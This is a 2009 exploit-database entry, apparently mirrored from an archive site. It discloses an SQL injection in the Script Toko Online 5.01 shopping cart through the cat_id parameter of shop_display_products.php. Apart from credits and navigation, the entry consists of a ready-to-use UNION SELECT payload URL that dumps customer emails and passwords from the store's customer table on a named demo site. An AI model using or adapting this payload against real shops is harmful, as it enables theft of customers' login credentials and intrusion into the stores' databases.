[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Script Toko Online 5.01 (shop_display_products.php) SQL Injection Vuln
# Published : 2009-01-26
# Author : k1n9k0ng
# Previous Title : E-ShopSystem Auth Bypass / SQL Injection Multiple Vulnerabilities
# Next Title : SHOP-INET v4 (show_cat2.php grid) SQL Injection Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts : Script Toko Online Vs.5.01
Scripts site : http://www.gempar.com/
Discovered By : k1n9k0ng
My Site : http://www.sekuritionline.net
IRC Channel : #sekuritionline
Special To : adhietslank, cyberlog, cah_gemblunkz, jayoes, thesims, setiawan, fl3xu5, k1tk4t
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Demo Site :
http://www.gempar.com/demotoko/
Bug Found:
http://www.gempar.com/demotoko/shop_display_products.php?cat_id=-1 union select concat(email,0x3a,password),1,2,3,4,5,6,7 from naxtor_cart_store_customer/*
# www.Syue.com [2009-01-26]